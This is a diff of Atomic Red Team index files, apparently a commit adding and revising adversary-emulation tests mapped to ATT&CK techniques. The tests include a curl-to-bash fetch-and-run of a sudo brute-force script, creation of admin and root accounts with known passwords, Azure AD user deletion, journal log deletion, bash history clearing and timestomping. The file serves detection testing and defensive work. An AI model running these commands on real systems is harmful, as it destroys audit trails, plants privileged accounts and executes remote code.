+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Check if running on a Redhat based machine.
+
+          '
+        prereq_command: |
+          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
+          if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'yum update && yum install -y openssl sudo curl
+
+          '
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
+
+          '
   T1003:
     technique:
       x_mitre_platforms:
@@ -84430,6 +85414,36 @@ discovery:
           -FilePath .\\CurrentUserObject.txt\n"
         cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force
 
+          '
+        name: powershell
+    - name: System Discovery - SocGholish whoami
+      auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+      description: "SocGholish performs whoami discovery commands and outputs the
+        results to a tmp file. \nThe test will generate a filename similar to the
+        random one generated during execution and write the file to AppData\\Temp.\n\nReference:
+        https://redcanary.com/threat-detection-report/threats/socgholish/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Location of output file
+          type: string
+          default: "$env:temp"
+      executor:
+        command: |
+          $TokenSet = @{
+            U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+            N = [Char[]]'0123456789'
+          }
+          $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+          $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+          $StringSet = $Upper + $Number
+          $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+          $file = "rad" + $rad + ".tmp"
+
+          whoami.exe /all >> #{output_path}\$file
+        cleanup_command: 'Remove-Item -Path #{output_path}\rad*.tmp -Force
+
           '
         name: powershell
   T1613:
@@ -85266,19 +86280,13 @@ discovery:
         code 4776 from the domain controller and stores the ouput in C:\\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)\n"
       supported_platforms:
       - windows
-      input_arguments:
-        Domain:
-          description: Domain that is being tested against
-          type: string
-          default: "$env:USERDOMAIN"
-        DomainController:
-          description: Domain Controller that is being tested against
-          type: string
-          default: "$env:UserDnsDomain"
       executor:
-        command: wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security
-          C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
-        cleanup_command: 'Remove-Item C:\Temp\ntlmusers.evtx
+        command: |-
+          $target = $env:LOGONSERVER
+          $target = $target.Trim("\\")
+          $IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
+          wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
+        cleanup_command: 'Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
 
           '
         name: powershell
@@ -89272,6 +90280,24 @@ discovery:
       executor:
         command: 'wmic process get /format:list
 
+          '
+        name: command_prompt
+    - name: Discover Specific Process - tasklist
+      auto_generated_guid: 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+      description: "Adversaries may use command line tools to discover specific processes
+        in preparation of further attacks. \nExamples of this could be discovering
+        the PID of lsass.exe to dump its memory or discovering whether specific security
+        processes (e.g. AV or EDR) are running.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        process_to_enumerate:
+          description: Process name string to search for.
+          type: string
+          default: lsass
+      executor:
+        command: 'tasklist | findstr #{process_to_enumerate}
+
           '
         name: command_prompt
   T1497.002:
@@ -90023,8 +91049,45 @@ discovery:
           reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
           reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
           reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+          reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
+          reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
+          reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
         name: command_prompt
         elevation_required: true
+    - name: Query Registry with Powershell cmdlets
+      auto_generated_guid: 0434d081-bb32-42ce-bcbb-3548e4f2628f
+      description: "Query Windows Registry with Powershell cmdlets, i.e., Get-Item
+        and Get-ChildItem. The results from above can also be achieved with Get-Item
+        and Get-ChildItem.\nUnlike using \"reg query\" which then executes reg.exe,
+        using cmdlets won't generate new processes, which may evade detection systems
+        monitoring process generation. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: "Get-Item -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\\" | findstr
+          Windows\nGet-Item -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"\nGet-Item
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nGet-Item
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\nGet-ChildItem
+          -Path \"HKLM:system\\currentcontrolset\\services\" \nGet-Item -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKLM:SYSTEM\\CurrentControlSet\\Control\\SafeBoot\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Scripts\\Startup\"\n"
+        name: powershell
+        elevation_required: true
     - name: Enumerate COM Objects in Registry with Powershell
       auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
       description: "This test is designed to enumerate the COM objects listed in HKCR,
@@ -101360,6 +102423,73 @@ impact:
           }
         name: powershell
         elevation_required: false
+    - name: Azure AD - Delete user via Azure AD PowerShell
+      auto_generated_guid: 4f577511-dc1c-4045-bcb8-75d2457f01f4
+      description: Deletes a user in Azure AD. Adversaries may interrupt availability
+        of system and network resources by inhibiting access to accounts utilized
+        by legitimate users. Accounts may be deleted, locked, or manipulated (excluding
+        changed credentials) to remove access to accounts.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        userprincipalname:
+          description: User principal name (UPN) for the Azure user being deleted
+          type: String
+          default: atomicredteam@yourdomain.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Get-InstalledModule -Name AzureAD
+        get_prereq_command: echo "use the following to install AzureAD PowerShell
+          module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery
+          -Force"
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "Connect-AzureAD\n$userprincipalname = \"#{userprincipalname}\"\nRemove-AzureADUser
+          -ObjectId $userprincipalname      "
+        cleanup_command: N/A
+        name: powershell
+    - name: Azure AD - Delete user via Azure CLI
+      auto_generated_guid: c955c1c7-3145-4a22-af2d-63eea0d967f0
+      description: Deletes a user in Azure AD. Adversaries may interrupt availability
+        of system and network resources by inhibiting access to accounts utilized
+        by legitimate users. Accounts may be deleted, locked, or manipulated (excluding
+        changed credentials) to remove access to accounts.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        userprincipalname:
+          description: User principal name (UPN) for the Azure user being deleted
+          type: String
+          default: atomicredteam@yourdomain.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if Azure CLI is installed and install manually
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI manually
+          https://aka.ms/installazurecliwindows"
+      - description: Check if Azure CLI is installed and install via PowerShell
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference
+          = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows
+          -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I
+          AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+      - description: Update the userprincipalname to meet your requirements
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: |-
+          az login
+          $userprincipalname = "#{userprincipalname}"
+          az ad user delete --id $userprincipalname
+        cleanup_command: N/A
+        name: powershell
   T1486:
     technique:
       x_mitre_platforms:
@@ -104816,6 +105946,45 @@ initial-access:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function

atomics/Indexes/linux-index.yaml

@@ -3022,6 +3022,21 @@ defense-evasion:
           sudo rm -rf /private/var/audit/*
         name: sh
         elevation_required: true
+    - name: Delete system journal logs via rm and journalctl utilities
+      auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf
+      description: 'The first sub-test deletes the journal files using rm utility
+        in the "/var/log/journal/" directory and the second sub-test clears the journal
+        by modifiying time period of logs that should be retained to zero.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: |
+          sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+          sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
+        name: sh
+        elevation_required: true
     - name: Overwrite Linux Mail Spool
       auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
       description: 'This test overwrites the Linux mail spool of a specified user.
@@ -4212,10 +4227,6 @@ defense-evasion:
           description: Encoded
           type: string
           default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
-        zsh_encoded:
-          description: Encoded
-          type: string
-          default: IyEvYmluL3pzaAplY2hvICJodHRwczovL3d3dy55b3V0dWJlLmNvbS9AYXRvbWljc29uYWZyaWRheSBGVFciCg==
         fish_encoded:
           description: Encoded
           type: string
@@ -4305,7 +4316,43 @@ defense-evasion:
       - Administrator
       - User
       identifier: T1562
-    atomic_tests: []
+    atomic_tests:
+    - name: Disable journal logging via systemctl utility
+      auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
+      description: 'The atomic test disables the journal logging using built-in systemctl
+        utility
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sudo systemctl stop systemd-journald #disables journal logging
+
+          '
+        cleanup_command: |
+          sudo systemctl start systemd-journald #starts journal service
+          sudo systemctl enable systemd-journald #starts journal service automatically at boot time
+        name: sh
+        elevation_required: true
+    - name: Disable journal logging via sed utility
+      auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
+      description: 'The atomic test disables the journal logging by searching and
+        replacing the "Storage" parameter to "none" within the journald.conf file,
+        thus any new journal entries will only be temporarily available in memory
+        and not written to disk
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sudo sed -i ''s/Storage=auto/Storage=none/'' /etc/systemd/journald.conf
+
+          '
+        cleanup_command: |
+          sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
+          sudo systemctl restart systemd-journald #restart the journal service
+        name: sh
+        elevation_required: true
   T1055.003:
     technique:
       x_mitre_platforms:
@@ -4874,10 +4921,23 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-access.txt"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 file access timestomp test'' > #{target_filename}
+
+          '
       executor:
         command: 'touch -a -t 197001010000.00 #{target_filename}
 
+          '
+        cleanup_command: 'rm -f #{target_filename}
+
           '
         name: sh
     - name: Set a file's modification timestamp
@@ -4892,10 +4952,24 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-modification.txt"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 file modification timestomp test'' >
+          #{target_filename}
+
+          '
       executor:
         command: 'touch -m -t 197001010000.00 #{target_filename}
 
+          '
+        cleanup_command: 'rm -f #{target_filename}
+
           '
         name: sh
     - name: Set a file's creation timestamp
@@ -4912,14 +4986,18 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-creation.txt"
       executor:
+        elevation_required: true
         command: |
-          NOW=$(date)
-          date -s "1970-01-01 00:00:00"
+          NOW=$(date +%m%d%H%M%Y)
+          date 010100001971
           touch #{target_filename}
-          date -s "$NOW"
+          date "$NOW"
           stat #{target_filename}
+        cleanup_command: 'rm -f #{target_filename}
+
+          '
         name: sh
     - name: Modify file timestamps using reference file
       auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50
@@ -4934,14 +5012,27 @@ defense-evasion:
         target_file_path:
           description: Path of file to modify timestamps of
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-reference.txt"
         reference_file_path:
           description: Path of reference file to read timestamps from
           type: path
           default: "/bin/sh"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_file_path} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 reference file timestomp test'' > #{target_file_path}
+
+          '
       executor:
         command: 'touch -acmr #{reference_file_path} #{target_file_path}
 
+          '
+        cleanup_command: 'rm -f #{target_file_path}
+
           '
         name: sh
   T1620:
@@ -6681,7 +6772,7 @@ defense-evasion:
     - name: Pad Binary to Change Hash - Linux/macOS dd
       auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a
       description: |
-        Uses dd to add a zero to the binary to change the hash.
+        Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
 
         Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
       supported_platforms:
@@ -6704,7 +6795,41 @@ defense-evasion:
 
           '
       executor:
-        command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
+        command: |
+          dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
+          dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
+          dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
+        cleanup_command: 'rm #{file_to_pad}
+
+          '
+        name: sh
+    - name: Pad Binary to Change Hash using truncate command - Linux/macOS
+      auto_generated_guid: e22a9e89-69c7-410f-a473-e6c212cd2292
+      description: |
+        Uses truncate to add a byte to the binary to change the hash.
+
+        Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_to_pad:
+          description: Path of binary to be padded
+          type: path
+          default: "/tmp/evil-binary"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'The binary must exist on disk at specified location (#{file_to_pad})
+
+          '
+        prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
+
+          '
+        get_prereq_command: 'cp /bin/ls #{file_to_pad}
+
+          '
+      executor:
+        command: 'truncate -s +1 #{file_to_pad} #adds a byte to the file size
 
           '
         cleanup_command: 'rm #{file_to_pad}
@@ -9443,6 +9568,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -10312,6 +10438,115 @@ defense-evasion:
           3. ls
           4. whoami > recon.txt
         name: manual
+    - name: Clear bash history
+      auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
+      description: "An attacker may clear the bash history cache and the history file
+        as their last act before logging off to remove the record of their command
+        line activities. \n\nIn this test we use the $HISTFILE variable throughout
+        to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
+        the file is empty 6 clear the history cache 7. confirm the history cache is
+        empty. This is when the attacker would logoff.\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
+          fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
+          is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
+          [ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
+        cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
+    - name: Setting the HISTCONTROL environment variable
+      auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
+      description: "An attacker may exploit the space before a command (e.g. \" ls\")
+        or the duplicate command suppression feature in Bash history to prevent their
+        commands from being recorded in the history file or to obscure the order of
+        commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
+        the history cache 3. executes ls -la with a space in-front of it 4. confirms
+        that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
+        6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
+        that their is only one command in history\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
+          ]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
+          # \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
+          -la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif
+          [ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\";
+          fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif
+          [ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls
+          -la $HISTFILE\"; fi\n"
+        cleanup_command: 'export HISTCONTROL=$(echo $TEST)
+
+          '
+    - name: Setting the HISTFILESIZE environment variable
+      auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+      description: |
+        An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
+
+        Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          TEST=$(echo $HISTFILESIZE)
+          echo $HISTFILESIZE
+          export HISTFILESIZE=0
+          if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
+          # -> $HISTFILESIZE is zero
+        cleanup_command: 'export HISTCONTROL=$(echo $TEST)
+
+          '
+    - name: Setting the HISTFILE environment variable
+      auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+      description: |
+        An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
+
+        Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          TEST=$(echo $HISTFILE)
+          echo $HISTFILE
+          export HISTFILE="/dev/null"
+          if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
+          # -> $HISTFILE is /dev/null
+        cleanup_command: 'export HISTFILE=$(echo $TEST)
+
+          '
+    - name: Setting the HISTIGNORE environment variable
+      auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
+      description: "An Adversary may take advantage of the HISTIGNORE environment
+        variable either to ignore particular commands or all commands. \n\nIn this
+        test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
+        history cache 3..4 execute ls commands 5. confirm that the ls commands are
+        not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
+        ignoring ALL commands.\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
+          else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
+          fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la
+          ~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands
+          are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif
+          ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export
+          HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE
+          = *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo
+          \"History cache is empty\"; fi\n# -> History cache is empty\n"
+        cleanup_command: 'unset HISTIGNORE
+
+          '
   T1497.002:
     technique:
       x_mitre_platforms:
@@ -14806,13 +15041,31 @@ defense-evasion:
       - linux
       - macos
       input_arguments:
+        parent_folder:
+          description: Path of parent folder
+          type: path
+          default: "/tmp/victim-files/"
         file_to_delete:
           description: Path of file to delete
           type: path
-          default: "/tmp/victim-files/a"
+          default: "/tmp/victim-files/T1070.004-test.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'The file must exist in order to be deleted
+
+          '
+        prereq_command: 'test -e #{file_to_delete} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'mkdir -p #{parent_folder} && touch #{file_to_delete}
+
+          '
       executor:
         command: 'rm -f #{file_to_delete}
 
+          '
+        cleanup_command: 'rm -rf #{parent_folder}
+
           '
         name: sh
     - name: Delete an entire folder - Linux/macOS
@@ -14828,7 +15081,18 @@ defense-evasion:
         folder_to_delete:
           description: Path of folder to delete
           type: path
-          default: "/tmp/victim-files"
+          default: "/tmp/victim-folder"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'The folder must exist in order to be deleted
+
+          '
+        prereq_command: 'test -e #{folder_to_delete} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'mkdir -p #{folder_to_delete}
+
+          '
       executor:
         command: 'rm -rf #{folder_to_delete}
 
@@ -31109,6 +31373,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -50796,81 +51061,92 @@ credential-access:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1110.001
     atomic_tests:
-    - name: SUDO brute force Debian
-      auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-      description: |
-        Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-        PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-        If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-        The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
+    - name: SUDO Brute Force - Debian
+      auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
       supported_platforms:
       - linux
-      dependency_executor_name: sh
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
       dependencies:
       - description: 'Check if running on a Debian based machine.
 
           '
         prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
           if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-          cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-          cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-        get_prereq_command: 'apt-get update && apt-get install -y sudo
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'apt update && apt install -y openssl sudo curl
 
           '
       executor:
-        elevation_required: false
+        name: bash
+        elevation_required: true
         command: |
-          for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-          echo done
-        cleanup_command: 'rm -f /tmp/asker /tmp/workingfile
+          useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
